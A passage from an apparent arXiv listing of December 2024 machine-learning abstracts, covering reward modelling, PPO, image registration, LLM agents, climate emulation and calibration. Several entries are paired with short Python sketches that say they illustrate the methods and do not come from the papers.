governance and regulation of frontier AI models.
Updated: 2024-12-05 02:37:51
Categories: cs.AI
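To make the canary-token recommendation concrete, here is a minimal sketch (not from the paper) of how a data producer might mint, embed, and later detect such a token; the token format, embedding rate, and the `model_generate` probe interface are illustrative assumptions.

```python
import hashlib
import uuid

def make_canary(owner_id: str) -> str:
    # A unique, high-entropy string that is unlikely to occur naturally.
    # The "CANARY" prefix and layout are illustrative, not a standard.
    nonce = uuid.uuid4().hex
    digest = hashlib.sha256(f"{owner_id}:{nonce}".encode()).hexdigest()[:16]
    return f"CANARY-{owner_id}-{digest}"

def embed_canary(documents: list[str], canary: str, every: int = 1000) -> list[str]:
    # Append the canary to every `every`-th document before release.
    return [
        doc + f"\n{canary}" if i % every == 0 else doc
        for i, doc in enumerate(documents)
    ]

def detect_canary(model_generate, canary: str, probes: list[str]) -> bool:
    # If the model reproduces the canary verbatim under probing, the
    # released data was very likely used in training.
    return any(canary in model_generate(p) for p in probes)
```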
Beyond the Binary: Capturing Diverse Preferences With Reward Regularization
Large language models (LLMs) are increasingly deployed via public-facing interfaces to interact with millions of users, each with diverse preferences. Despite this, preference tuning of LLMs predominantly relies on reward models trained using binary judgments where annotators select the preferred choice out of pairs of model outputs. In this work, we argue that this reliance on binary choices does not capture the broader, aggregate preferences of the target user in real-world tasks. We propose a taxonomy that identifies two dimensions of subjectivity where different users disagree on the preferred output: the Plurality of Responses to Prompts, where prompts allow for multiple correct answers, and the Indistinguishability of Responses, where candidate outputs are paraphrases of each other. We show that reward models correlate weakly with user preferences in these cases. As a first step to address this issue, we introduce a simple yet effective method that augments existing binary preference datasets with synthetic preference judgments to estimate potential user disagreement. Incorporating these via a margin term as a form of regularization during model training yields predictions that better align with the aggregate user preferences.
Updated: 2024-12-05 02:35:46
Categories: cs.CL,cs.AI
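A minimal sketch of how such a disagreement-derived margin might enter a standard Bradley-Terry reward-model loss; the specific mapping from estimated disagreement to margin (here `1 - disagreement`) is our assumption for illustration, not the paper's formula.

```python
import torch
import torch.nn.functional as F

def reward_loss_with_margin(r_chosen, r_rejected, disagreement):
    """Bradley-Terry pairwise loss with a disagreement-aware margin.

    disagreement: estimated probability (in [0, 1]) that users would
    disagree on this pair; pairs users clearly agree on must be separated
    by a larger reward margin, acting as a regularizer.
    """
    margin = 1.0 - disagreement
    return -F.logsigmoid(r_chosen - r_rejected - margin).mean()

# Toy usage on a batch of 8 preference pairs.
r_c, r_r = torch.randn(8), torch.randn(8)
print(reward_loss_with_margin(r_c, r_r, torch.rand(8)))
```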
Accelerating Proximal Policy Optimization Learning Using Task Prediction for Solving Environments with Delayed Rewards
In this paper, we tackle the challenging problem of delayed rewards in reinforcement learning (RL). While Proximal Policy Optimization (PPO) has emerged as a leading Policy Gradient method, its performance can degrade under delayed rewards. We introduce two key enhancements to PPO: a hybrid policy architecture that combines an offline policy (trained on expert demonstrations) with an online PPO policy, and a reward shaping mechanism using Time Window Temporal Logic (TWTL). The hybrid architecture leverages offline data throughout training while maintaining PPO's theoretical guarantees. Building on the monotonic improvement framework of Trust Region Policy Optimization (TRPO), we prove that our approach ensures improvement over both the offline policy and previous iterations, with a bounded performance gap of $(2\varsigma\gamma\alpha^2)/(1-\gamma)^2$, where $\alpha$ is the mixing parameter, $\gamma$ is the discount factor, and $\varsigma$ bounds the expected advantage. Additionally, we prove that our TWTL-based reward shaping preserves the optimal policy of the original problem. TWTL enables the formal translation of temporal objectives into immediate feedback signals that guide learning. We demonstrate the effectiveness of our approach through extensive experiments on inverted pendulum and lunar lander environments, showing improvements in both learning speed and final performance compared to standard PPO and offline-only approaches.
Updated: 2024-12-05 02:30:43
Categories: cs.LG,cs.AI
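Two pieces of this abstract are easy to state in code: the quoted performance-gap bound, and one reading of the mixing parameter $\alpha$ as a probabilistic mixture of the offline and online policies (the paper may instead mix at the distribution level, so the sampling interpretation below is an assumption).

```python
import random

def performance_gap_bound(varsigma, gamma, alpha):
    """Bound quoted in the abstract: (2*varsigma*gamma*alpha^2)/(1-gamma)^2."""
    return (2.0 * varsigma * gamma * alpha ** 2) / (1.0 - gamma) ** 2

def hybrid_action(offline_policy, online_policy, state, alpha):
    """Act with the offline (demonstration) policy with probability alpha,
    otherwise with the online PPO policy."""
    policy = offline_policy if random.random() < alpha else online_policy
    return policy(state)

# The bound grows quickly as gamma -> 1, e.g.:
print(performance_gap_bound(varsigma=1.0, gamma=0.99, alpha=0.3))  # ~1782
```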
Deep Implicit Optimization enables Robust Learnable Features for Deformable Image Registration
Deep Learning in Image Registration (DLIR) methods have been tremendously successful due to their speed and their ability to incorporate weak label supervision at training time. However, existing DLIR methods forego many of the benefits and invariances of optimization methods. The lack of a task-specific inductive bias in DLIR methods leads to suboptimal performance, especially in the presence of domain shift. Our method aims to bridge this gap between statistical learning and optimization by explicitly incorporating optimization as a layer in a deep network. A deep network is trained to predict multi-scale dense feature images that are registered using a black-box iterative optimization solver. This optimal warp is then used to minimize image and label alignment errors. By implicitly differentiating end-to-end through an iterative optimization solver, we explicitly exploit the invariances of the correspondence matching problem induced by the optimization, while learning registration- and label-aware features, and guaranteeing that the warp is a local minimum of the registration objective in the feature space. Our framework shows excellent performance on in-domain datasets and is agnostic to domain shifts such as anisotropy and varying intensity profiles. For the first time, our method allows switching between arbitrary transformation representations (free-form to diffeomorphic) at test time with zero retraining. End-to-end feature learning also facilitates interpretability of features and arbitrary test-time regularization, which is not possible with existing DLIR methods.
Updated: 2024-12-05 02:26:30
Categories: cs.CV,cs.LG,eess.IV
Reconstruction of boosted and resolved multi-Higgs-boson events with symmetry-preserving attention networks
The production of multiple Higgs bosons at the CERN LHC provides a direct way to measure the trilinear and quartic Higgs self-interaction strengths as well as potential access to beyond-the-standard-model effects that can enhance production at large transverse momentum $p_{\mathrm{T}}$. The largest event fraction arises from the fully hadronic final state, in which every Higgs boson decays to a bottom quark-antiquark pair ($b\bar{b}$). This introduces a combinatorial challenge known as the "jet assignment problem": assigning jets to sets representing Higgs boson candidates. Symmetry-preserving attention networks (SPA-Nets) have been developed to address this challenge. However, the complexity of jet assignment increases when simultaneously considering both $H\rightarrow b\bar{b}$ reconstruction possibilities, i.e., two "resolved" small-radius jets, each containing a shower initiated by a $b$-quark, or one "boosted" large-radius jet containing a merged shower initiated by a $b\bar{b}$ pair. The latter improves the reconstruction efficiency at high $p_{\mathrm{T}}$. In this work, we introduce a generalization of the SPA-Net approach that simultaneously considers both boosted and resolved reconstruction possibilities and unambiguously interprets an event as "fully resolved", "fully boosted", or in between. We report the performance of baseline methods, the original SPA-Net approach, and our generalized version on nonresonant $HH$ and $HHH$ production at the LHC. Considering both boosted and resolved topologies, our SPA-Net approach increases the Higgs boson reconstruction purity by 57-62% and the efficiency by 23-38% compared to the baseline method, depending on the final state.
Updated: 2024-12-05 02:24:52
Categories: hep-ph,cs.LG,hep-ex,physics.data-an
Synergizing LLMs and Knowledge Graphs: A Novel Approach to Software Repository-Related Question Answering
Software repositories contain valuable information for gaining insights into their development process. However, extracting insights from these repository data is time-consuming and requires technical expertise. While software engineering chatbots have been developed to facilitate natural language interactions with repositories, they struggle with understanding natural language and accurately retrieving relevant data. This study aims to improve the accuracy of LLM-based chatbots in answering repository-related questions by augmenting them with knowledge graphs. We achieve this in a two-step approach: (1) constructing a knowledge graph from the repository data and (2) synergizing the knowledge graph with the LLM to support natural language questions and answers. We curated a set of 20 questions of varying complexity and evaluated our approach on five popular open-source projects. Our approach achieved an accuracy of 65%. We further investigated the limitations and identified six key issues, the majority relating to the reasoning capability of the LLM. We experimented with few-shot chain-of-thought prompting to determine whether it could enhance our approach. This technique improved the overall accuracy to 84%. Our findings demonstrate the synergy between LLMs and knowledge graphs as a viable solution for making repository data accessible to both technical and non-technical stakeholders.
Updated: 2024-12-05 02:18:03
Categories: cs.SE,cs.AI,cs.CL,cs.LG
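A hedged sketch of the two-step pipeline: build a small knowledge graph from repository data, retrieve a one-hop subgraph around the mentioned entity, and pack it into an LLM prompt. The graph schema, the prompt wording, and the `ask_llm` callable are placeholders, not the paper's implementation.

```python
import networkx as nx

# Step 1: a toy repository knowledge graph (schema is illustrative).
kg = nx.MultiDiGraph()
kg.add_edge("alice", "commit:42", key="authored")
kg.add_edge("commit:42", "src/parser.py", key="modified")
kg.add_edge("issue:7", "commit:42", key="fixed_by")

def retrieve_context(graph: nx.MultiDiGraph, entity: str) -> list[str]:
    # Step 2a: pull triples within one hop of the mentioned entity.
    return [
        f"({u}) -[{k}]-> ({v})"
        for u, v, k in graph.edges(keys=True)
        if entity in (u, v)
    ]

def answer(question: str, entity: str, ask_llm) -> str:
    # Step 2b: ground the LLM in the retrieved subgraph.
    context = "\n".join(retrieve_context(kg, entity))
    prompt = f"Repository facts:\n{context}\n\nQuestion: {question}\nAnswer:"
    return ask_llm(prompt)
```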
VimTS: A Unified Video and Image Text Spotter for Enhancing the Cross-domain Generalization
Text spotting, a task involving the extraction of textual information from image or video sequences, faces challenges in cross-domain adaptation, such as image-to-image and image-to-video generalization. In this paper, we introduce a new method, termed VimTS, which enhances the generalization ability of the model by achieving better synergy among different tasks. Specifically, we propose a Prompt Queries Generation Module and a Tasks-aware Adapter to effectively convert the original single-task model into a multi-task model suitable for both image and video scenarios with minimal additional parameters. The Prompt Queries Generation Module facilitates explicit interaction between different tasks, while the Tasks-aware Adapter helps the model dynamically learn suitable features for each task. Additionally, to further enable the model to learn temporal information at a lower cost, we propose a synthetic video text dataset (VTD-368k) by leveraging the Content Deformation Fields (CoDeF) algorithm. Notably, our method outperforms the state-of-the-art method by an average of 2.6% on six cross-domain benchmarks such as TT-to-IC15, CTW1500-to-TT, and TT-to-CTW1500. For video-level cross-domain adaptation, our method even surpasses the previous end-to-end video spotting method on ICDAR2015 video and DSText v2 by an average of 5.5% on the MOTA metric, using only image-level data. We further demonstrate that existing Large Multimodal Models exhibit limitations in cross-domain scene text spotting, in contrast to our VimTS model, which requires significantly fewer parameters and less data. The code and datasets will be made available at https://VimTextSpotter.github.io.
Updated: 2024-12-05 02:13:51
Categories: cs.CV,cs.AI
SG-I2V: Self-Guided Trajectory Control in Image-to-Video Generation
Methods for image-to-video generation have achieved impressive, photo-realistic quality. However, adjusting specific elements in generated videos, such as object motion or camera movement, is often a tedious process of trial and error, e.g., involving re-generating videos with different random seeds. Recent techniques address this issue by fine-tuning a pre-trained model to follow conditioning signals, such as bounding boxes or point trajectories. Yet, this fine-tuning procedure can be computationally expensive, and it requires datasets with annotated object motion, which can be difficult to procure. In this work, we introduce SG-I2V, a framework for controllable image-to-video generation that is self-guided, offering zero-shot control by relying solely on the knowledge present in a pre-trained image-to-video diffusion model without the need for fine-tuning or external knowledge. Our zero-shot method outperforms unsupervised baselines while significantly narrowing the performance gap with supervised models in terms of visual quality and motion fidelity.
Updated: 2024-12-05 02:08:20
Categories: cs.CV,cs.LG
ScribeAgent: Towards Specialized Web Agents Using Production-Scale Workflow Data
Large Language Model (LLM) agents are rapidly improving to handle increasingly complex web-based tasks. Most of these agents rely on general-purpose, proprietary models like GPT-4 and focus on designing better prompts to improve their planning abilities. However, general-purpose LLMs are not specifically trained to understand specialized web contexts such as HTML, and they often struggle with long-horizon planning. We explore an alternative approach that fine-tunes open-source LLMs using production-scale workflow data collected from over 250 domains corresponding to 6 billion tokens. This simple yet effective approach shows substantial gains over prompting-based agents on existing benchmarks -- ScribeAgent achieves state-of-the-art direct generation performance on Mind2Web and improves the task success rate by 7.3% over the previous best text-only web agents on WebArena. We further perform detailed ablation studies on various fine-tuning design choices and provide insights into LLM selection, training recipes, context window optimization, and effect of dataset sizes.
Updated: 2024-12-05 02:00:07
Categories: cs.CL,cs.AI
Data-driven Piecewise Affine Decision Rules for Stochastic Programming with Covariate Information
Focusing on stochastic programming (SP) with covariate information, this paper proposes an empirical risk minimization (ERM) method embedded within a nonconvex piecewise affine decision rule (PADR), which aims to learn the direct mapping from features to optimal decisions. We establish the nonasymptotic consistency result of our PADR-based ERM model for unconstrained problems and asymptotic consistency result for constrained ones. To solve the nonconvex and nondifferentiable ERM problem, we develop an enhanced stochastic majorization-minimization algorithm and establish the asymptotic convergence to (composite strong) directional stationarity along with complexity analysis. We show that the proposed PADR-based ERM method applies to a broad class of nonconvex SP problems with theoretical consistency guarantees and computational tractability. Our numerical study demonstrates the superior performance of PADR-based ERM methods compared to state-of-the-art approaches under various settings, with significantly lower costs, less computation time, and robustness to feature dimensions and nonlinearity of the underlying dependency.
Updated: 2024-12-05 01:50:52
Categories: math.OC,cs.LG,stat.ML
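Nonconvex piecewise affine decision rules of this kind are commonly parameterized as a difference of two max-affine functions; the sketch below follows that convention, which we assume approximates the paper's PADR but is not taken from it.

```python
import numpy as np

rng = np.random.default_rng(0)
d, k1, k2 = 5, 4, 4          # feature dim; pieces in each max-affine part
A, a = rng.normal(size=(k1, d)), rng.normal(size=k1)
B, b = rng.normal(size=(k2, d)), rng.normal(size=k2)

def padr(x: np.ndarray) -> float:
    # Difference of two max-affine functions: piecewise affine, nonconvex,
    # mapping covariates x directly to a (scalar) decision.
    return float(np.max(A @ x + a) - np.max(B @ x + b))

x = rng.normal(size=d)
print(padr(x))
```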
Agent AI with LangGraph: A Modular Framework for Enhancing Machine Translation Using Large Language Models
This paper explores the transformative role of Agent AI and LangGraph in advancing the automation and effectiveness of machine translation (MT). Agents are modular components designed to perform specific tasks, such as translating between particular languages, with specializations like TranslateEnAgent, TranslateFrenchAgent, and TranslateJpAgent for English, French, and Japanese translations, respectively. These agents leverage the powerful semantic capabilities of large language models (LLMs), such as GPT-4o, to ensure accurate, contextually relevant translations while maintaining modularity, scalability, and context retention. LangGraph, a graph-based framework built on LangChain, simplifies the creation and management of these agents and their workflows. It supports dynamic state management, enabling agents to maintain dialogue context and automates complex workflows by linking agents and facilitating their collaboration. With flexibility, open-source community support, and seamless integration with LLMs, LangGraph empowers agents to deliver high-quality translations. Together, Agent AI and LangGraph create a cohesive system where LangGraph orchestrates agent interactions, ensuring that user inputs are analyzed, routed, and processed efficiently. Experimental results demonstrate the potential of this system to enhance multilingual translation accuracy and scalability. By highlighting modular design and automated workflows, this paper sets the stage for further innovations in intelligent machine translation services.
Updated: 2024-12-05 01:45:12
Categories: cs.CL,cs.AI
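A minimal sketch of the routing pattern described above, with stub functions standing in for the GPT-4o-backed translation agents. The LangGraph API names (`StateGraph`, `add_conditional_edges`, `END`) follow the library as of late 2024 and may differ across versions; the state schema and node names are our own.

```python
from typing import TypedDict
from langgraph.graph import StateGraph, END  # pip install langgraph

class MTState(TypedDict):
    text: str
    target: str   # e.g. "en" or "fr"
    output: str

# Stand-ins for LLM-backed agents; a real system would call e.g. GPT-4o here.
def translate_en(state: MTState) -> dict:
    return {"output": f"[English translation of] {state['text']}"}

def translate_fr(state: MTState) -> dict:
    return {"output": f"[French translation of] {state['text']}"}

def route(state: MTState) -> str:
    return state["target"]  # pick the agent for the requested language

builder = StateGraph(MTState)
builder.add_node("router", lambda state: {})   # routing only, no state change
builder.add_node("translate_en", translate_en)
builder.add_node("translate_fr", translate_fr)
builder.set_entry_point("router")
builder.add_conditional_edges("router", route,
                              {"en": "translate_en", "fr": "translate_fr"})
builder.add_edge("translate_en", END)
builder.add_edge("translate_fr", END)
graph = builder.compile()

print(graph.invoke({"text": "Bonjour le monde", "target": "en", "output": ""}))
```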
ELEMENT: Episodic and Lifelong Exploration via Maximum Entropy
This paper proposes Episodic and Lifelong Exploration via Maximum ENTropy (ELEMENT), a novel, multiscale, intrinsically motivated reinforcement learning (RL) framework that is able to explore environments without using any extrinsic reward and to transfer the learned skills effectively to downstream tasks. We advance the state of the art in three ways. First, we propose a multiscale entropy optimization to address the fact that the previous maximum state entropy objective, when used for lifelong exploration over millions of state observations, suffers from vanishing rewards and becomes computationally expensive across iterations. We therefore add an episodic maximum entropy term over each episode to speed up the search further. Second, we propose a novel intrinsic reward for episodic entropy maximization, named average episodic state entropy, which provides the optimal solution for a theoretical upper bound of the episodic state entropy objective. Third, to speed up lifelong entropy maximization, we propose a $k$ nearest neighbors ($k$NN) graph to organize the entropy estimation and updating processes, which reduces the computation substantially. Our ELEMENT significantly outperforms state-of-the-art intrinsic rewards in both episodic and lifelong setups. Moreover, it can be exploited in task-agnostic pre-training, collecting data for offline reinforcement learning, and similar applications.
Updated: 2024-12-05 01:42:13
Categories: cs.LG,cs.AI
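Particle-based entropy estimators typically reward a state by the log distance to its $k$-th nearest neighbor among visited states; the episodic sketch below is in that spirit and is our assumption about the general shape of such a reward, not the paper's exact estimator (which additionally maintains a $k$NN graph for the lifelong term).

```python
import numpy as np

def knn_intrinsic_reward(state: np.ndarray,
                         episode_states: np.ndarray,
                         k: int = 5) -> float:
    """Episodic intrinsic reward ~ log distance to the k-th nearest
    neighbor among states visited earlier in the same episode."""
    if len(episode_states) < k:
        return 0.0
    dists = np.linalg.norm(episode_states - state, axis=1)
    kth = np.partition(dists, k - 1)[k - 1]
    return float(np.log(kth + 1e-8))  # larger when the state is novel

# Toy usage: score a new state against 100 previously visited 4-D states.
visited = np.random.randn(100, 4)
print(knn_intrinsic_reward(np.random.randn(4), visited))
```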
Automated Multi-Label Annotation for Mental Health Illnesses Using Large Language Models
The growing prevalence and complexity of mental health disorders present significant challenges for accurate diagnosis and treatment, particularly in understanding the interplay between co-occurring conditions. Mental health disorders, such as depression and anxiety, often co-occur, yet current datasets derived from social media posts typically focus on single-disorder labels, limiting their utility in comprehensive diagnostic analyses. This paper addresses this critical gap by proposing a novel methodology for cleaning, sampling, labeling, and combining data to create versatile multi-label datasets. Our approach introduces a synthetic labeling technique to transform single-label datasets into multi-label annotations, capturing the complexity of overlapping mental health conditions. To achieve this, two single-label datasets are first merged into a foundational multi-label dataset, enabling realistic analyses of co-occurring diagnoses. We then design and evaluate various prompting strategies for large language models (LLMs), ranging from single-label predictions to unrestricted prompts capable of detecting any present disorders. After rigorously assessing multiple LLMs and prompt configurations, the optimal combinations are identified and applied to label six additional single-disorder datasets from RMHD. The result is SPAADE-DR, a robust, multi-label dataset encompassing diverse mental health conditions. This research demonstrates the transformative potential of LLM-driven synthetic labeling in advancing mental health diagnostics from social media data, paving the way for more nuanced, data-driven insights into mental health care.
Updated: 2024-12-05 01:33:03
Categories: cs.AI
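As an illustration of the "unrestricted" end of the prompting spectrum mentioned above, a sketch that asks an LLM for every disorder present and parses a multi-label answer; the disorder list, template wording, and answer format are hypothetical, not the paper's prompts.

```python
DISORDERS = ["depression", "anxiety", "ptsd", "bipolar", "ocd", "adhd"]

def build_unrestricted_prompt(post: str) -> str:
    # "Unrestricted" strategy: ask for every disorder present, not one label.
    return (
        "Read the social media post below and list ALL mental health "
        f"conditions it may indicate, chosen from: {', '.join(DISORDERS)}. "
        "Answer with a comma-separated list, or 'none'.\n\n"
        f"Post: {post}\nConditions:"
    )

def parse_labels(llm_answer: str) -> list[str]:
    # Multi-label annotation: every named disorder found in the answer.
    return [d for d in DISORDERS if d in llm_answer.lower()]

print(parse_labels("depression, anxiety"))  # ['depression', 'anxiety']
```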
Samudra: An AI Global Ocean Emulator for Climate
AI emulators for forecasting have emerged as powerful tools that can outperform conventional numerical predictions. The next frontier is to build emulators for long-term climate projections with robust skill across a wide range of spatiotemporal scales, a particularly important goal for the ocean. Our work builds a skillful global emulator of the ocean component of a state-of-the-art climate model. We emulate key ocean variables (sea surface height, horizontal velocities, temperature, and salinity) across their full depth. We use a modified ConvNeXt UNet architecture trained on multiple depth levels of ocean data. We show that the ocean emulator, Samudra, which exhibits no drift relative to the truth, can reproduce the depth structure of ocean variables and their interannual variability. Samudra is stable for centuries and 150 times faster than the original ocean model. However, Samudra struggles to simultaneously capture the correct magnitude of the forcing trends and remain stable, which requires further work.
Updated: 2024-12-05 01:25:34
Categories: physics.ao-ph,cs.LG
Designing LLM Chains by Adapting Techniques from Crowdsourcing Workflows
LLM chains enable complex tasks by decomposing work into a sequence of subtasks. Similarly, the more established techniques of crowdsourcing workflows decompose complex tasks into smaller tasks for human crowdworkers. Chains address LLM errors analogously to the way crowdsourcing workflows address human error. To characterize opportunities for LLM chaining, we survey 107 papers across the crowdsourcing and chaining literature to construct a design space for chain development. The design space covers a designer's objectives and the tactics used to build workflows. We then surface strategies that mediate how workflows use tactics to achieve objectives. To explore how techniques from crowdsourcing may apply to chaining, we adapt crowdsourcing workflows to implement LLM chains across three case studies: creating a taxonomy, shortening text, and writing a short story. From the design space and our case studies, we identify takeaways for effective chain design and raise implications for future research and development.
Updated: 2024-12-05 01:03:37
Categories: cs.HC,cs.AI,cs.CL
Safe Adaptive Cruise Control Under Perception Uncertainty: A Deep Ensemble and Conformal Tube Model Predictive Control Approach
Autonomous driving heavily relies on perception systems to interpret the environment for decision-making. To enhance robustness in these safety-critical applications, this paper considers a Deep Ensemble of Deep Neural Network regressors integrated with Conformal Prediction to predict and quantify uncertainties. In the Adaptive Cruise Control setting, the proposed method performs state and uncertainty estimation from RGB images, informing the downstream controller of the DNN perception uncertainties. An adaptive cruise controller using Conformal Tube Model Predictive Control is designed to ensure probabilistic safety. Evaluations with a high-fidelity simulator demonstrate the algorithm's effectiveness in speed tracking and maintaining a safe distance, including in Out-Of-Distribution scenarios.
Updated: 2024-12-05 01:01:53
Categories: cs.RO,cs.AI,cs.SY,eess.SY
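A minimal sketch of the perception side only: a deep ensemble's mean prediction wrapped in a split conformal interval. The nonconformity score (absolute residual from the ensemble mean) and the calibration setup are simplifying assumptions; how the resulting tube feeds the MPC layer is beyond this sketch.

```python
import numpy as np

def conformal_interval(preds_cal, y_cal, preds_new, alpha=0.1):
    """Split conformal interval on top of a deep ensemble (a sketch).

    preds_cal: (M, n) ensemble predictions on a calibration set.
    y_cal: (n,) calibration targets.
    preds_new: (M,) ensemble predictions for one new input.
    Returns an interval with ~(1 - alpha) marginal coverage.
    """
    scores = np.abs(y_cal - preds_cal.mean(axis=0))  # nonconformity scores
    n = len(y_cal)
    # Finite-sample-corrected empirical quantile of the scores.
    idx = min(int(np.ceil((n + 1) * (1 - alpha))) - 1, n - 1)
    q = np.sort(scores)[idx]
    center = preds_new.mean()
    return center - q, center + q

# Toy usage: a 5-member ensemble and 200 calibration points.
cal = np.random.randn(5, 200)
y = cal.mean(axis=0) + 0.3 * np.random.randn(200)
print(conformal_interval(cal, y, np.random.randn(5)))
```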
Coordinate In and Value Out: Training Flow Transformers in Ambient Space
Flow matching models have emerged as a powerful method for generative modeling on domains like images or videos, and even on unstructured data like 3D point clouds. These models are commonly trained in two stages: first, a data compressor (i.e., a variational auto-encoder) is trained, and in a subsequent training stage a flow matching generative model is trained in the low-dimensional latent space of the data compressor. This two-stage paradigm adds complexity to the overall training recipe and sets obstacles for unifying models across data domains, as specific data compressors are used for different data modalities. To this end, we introduce Ambient Space Flow Transformers (ASFT), a domain-agnostic approach to learning flow matching transformers in ambient space, sidestepping the requirement of training compressors and simplifying the training process. We introduce a conditionally independent point-wise training objective that enables ASFT to make predictions continuously in coordinate space. Our empirical results demonstrate that, using general-purpose transformer blocks, ASFT effectively handles different data modalities such as images and 3D point clouds, achieving strong performance in both domains and outperforming comparable approaches. ASFT is a promising step towards domain-agnostic flow matching generative models that can be trivially adopted in different data domains.
Updated: 2024-12-05 01:00:07
Categories: cs.LG,cs.AI
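A sketch of a conditionally independent point-wise flow matching objective in ambient space, under the common linear-interpolation probability path; the `model(coords, values, t)` coordinate-in/value-out interface is inferred from the title and is an assumption, not the paper's exact formulation.

```python
import torch

def pointwise_fm_loss(model, coords, x0, x1):
    """Point-wise flow matching loss in ambient space (a sketch).

    coords: (B, N, C) query coordinates; x0: (B, N, D) noise values at
    those coordinates; x1: (B, N, D) data values there. `model` predicts
    a velocity per coordinate independently, given the noised values and t.
    """
    B = x0.shape[0]
    t = torch.rand(B, 1, 1)                 # one time per sample, broadcast
    x_t = (1 - t) * x0 + t * x1             # linear interpolation path
    target_v = x1 - x0                      # its constant target velocity
    pred_v = model(coords, x_t, t)
    return ((pred_v - target_v) ** 2).mean()
```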
Speech Recognition-based Feature Extraction for Enhanced Automatic Severity Classification in Dysarthric Speech
Due to the subjective nature of current clinical evaluation, the need for automatic severity evaluation of dysarthric speech has emerged. DNN models outperform ML models but lack user-friendly explainability, while ML models offer explainable results at the feature level but comparatively lower performance. Current ML models extract various features from raw waveforms to predict severity. However, existing methods do not encompass all the dysarthric features used in clinical evaluation. To address this gap, we propose a feature extraction method that minimizes information loss. We introduce ASR transcription as a novel feature extraction source: we fine-tune an ASR model on dysarthric speech, then use this model to transcribe dysarthric speech and extract word segment boundary information. This enables capturing finer pronunciation and broader prosodic features. These features demonstrated improved severity prediction performance over existing features, with a balanced accuracy of 83.72%.
Updated: 2024-12-05 00:12:53
Categories: cs.SD,cs.AI,eess.AS
Expressivity of Representation Learning on Continuous-Time Dynamic Graphs: An Information-Flow Centric Review
Graphs are ubiquitous in real-world applications, ranging from social networks to biological systems, and have inspired the development of Graph Neural Networks (GNNs) for learning expressive representations. While most research has centered on static graphs, many real-world scenarios involve dynamic, temporally evolving graphs, motivating the need for Continuous-Time Dynamic Graph (CTDG) models. This paper provides a comprehensive review of Graph Representation Learning (GRL) on CTDGs with a focus on Self-Supervised Representation Learning (SSRL). We introduce a novel theoretical framework that analyzes the expressivity of CTDG models through an Information-Flow (IF) lens, quantifying their ability to propagate and encode temporal and structural information. Leveraging this framework, we categorize existing CTDG methods based on their suitability for different graph types and application scenarios. Within the same scope, we examine the design of SSRL methods tailored to CTDGs, such as predictive and contrastive approaches, highlighting their potential to mitigate the reliance on labeled data. Empirical evaluations on synthetic and real-world datasets validate our theoretical insights, demonstrating the strengths and limitations of various methods across long-range, bipartite, and community-based graphs. This work offers both a theoretical foundation and practical guidance for selecting and developing CTDG models, advancing the understanding of GRL in dynamic settings.
Updated: 2024-12-05 00:12:50
Categories: cs.LG,cs.AI,68R10, 05Cxx, 68Txx,I.2.6; I.5.1; G.2.2
The broader spectrum of in-context learning
The ability of language models to learn a task from a few examples in context has generated substantial interest. Here, we provide a perspective that situates this type of supervised few-shot learning within a much broader spectrum of meta-learned in-context learning. Indeed, we suggest that any distribution of sequences in which context non-trivially decreases loss on subsequent predictions can be interpreted as eliciting a kind of in-context learning. We suggest that this perspective helps to unify the broad set of in-context abilities that language models exhibit, such as adapting to tasks from instructions or role play, or extrapolating time series. This perspective also sheds light on potential roots of in-context learning in lower-level processing of linguistic dependencies (e.g. coreference or parallel structures). Finally, taking this perspective highlights the importance of generalization, which we suggest can be studied along several dimensions: not only the ability to learn something novel, but also flexibility in learning from different presentations, and in applying what is learned. We discuss broader connections to past literature in meta-learning and goal-conditioned agents, and other perspectives on learning and adaptation. We close by suggesting that research on in-context learning should consider this broader spectrum of in-context capabilities and types of generalization.
Updated: 2024-12-05 00:05:11
Categories: cs.CL,cs.LG
Using Platt's scaling for calibration after undersampling -- limitations and how to address them
When modelling data where the response is dichotomous and highly imbalanced, response-based sampling where a subset of the majority class is retained (i.e., undersampling) is often used to create more balanced training datasets prior to modelling. However, the models fit to this undersampled data, which we refer to as base models, generate predictions that are severely biased. There are several calibration methods that can be used to combat this bias, one of which is Platt's scaling. Here, a logistic regression model is used to model the relationship between the base model's original predictions and the response. Despite its popularity for calibrating models after undersampling, Platt's scaling was not designed for this purpose. Our work presents what we believe is the first detailed study focused on the validity of using Platt's scaling to calibrate models after undersampling. We show analytically, as well as via a simulation study and a case study, that Platt's scaling should not be used for calibration after undersampling without critical thought. If Platt's scaling would have been able to successfully calibrate the base model had it been trained on the entire dataset (i.e., without undersampling), then Platt's scaling might be appropriate for calibration after undersampling. If this is not the case, we recommend a modified version of Platt's scaling that fits a logistic generalized additive model to the logit of the base model's predictions, as it is both theoretically motivated and performed well across the settings considered in our study.
Updated: 2024-12-05 00:00:18
Categories: stat.ME,cs.LG
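For reference, classic Platt's scaling amounts to a logistic regression fit on the (logit of the) base model's predicted probabilities, using a calibration set assumed here to follow the original, non-undersampled class balance; the paper's recommended variant would replace the linear logistic fit with a logistic GAM (e.g., via a package such as pygam). A sketch of the classic version:

```python
import numpy as np
from sklearn.linear_model import LogisticRegression

def platt_calibrator(base_probs_cal, y_cal, eps=1e-6):
    """Fit Platt's scaling on a calibration set and return a calibrator.

    base_probs_cal: biased probabilities from the model trained on
    undersampled data; y_cal: true labels with the original class balance.
    """
    p = np.clip(base_probs_cal, eps, 1 - eps)
    logits = np.log(p / (1 - p)).reshape(-1, 1)
    lr = LogisticRegression().fit(logits, y_cal)

    def calibrate(base_probs):
        s = np.clip(base_probs, eps, 1 - eps)
        z = np.log(s / (1 - s)).reshape(-1, 1)
        return lr.predict_proba(z)[:, 1]

    return calibrate

# Toy usage: base probabilities biased upward by undersampling.
rng = np.random.default_rng(0)
y = (rng.random(500) < 0.05).astype(int)                       # 5% positives
base = np.clip(0.5 * y + 0.3 + 0.1 * rng.standard_normal(500), 0.01, 0.99)
print(platt_calibrator(base, y)(base[:5]))                     # shrunk probs
```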
Exploring RAG-based Vulnerability Augmentation with LLMs
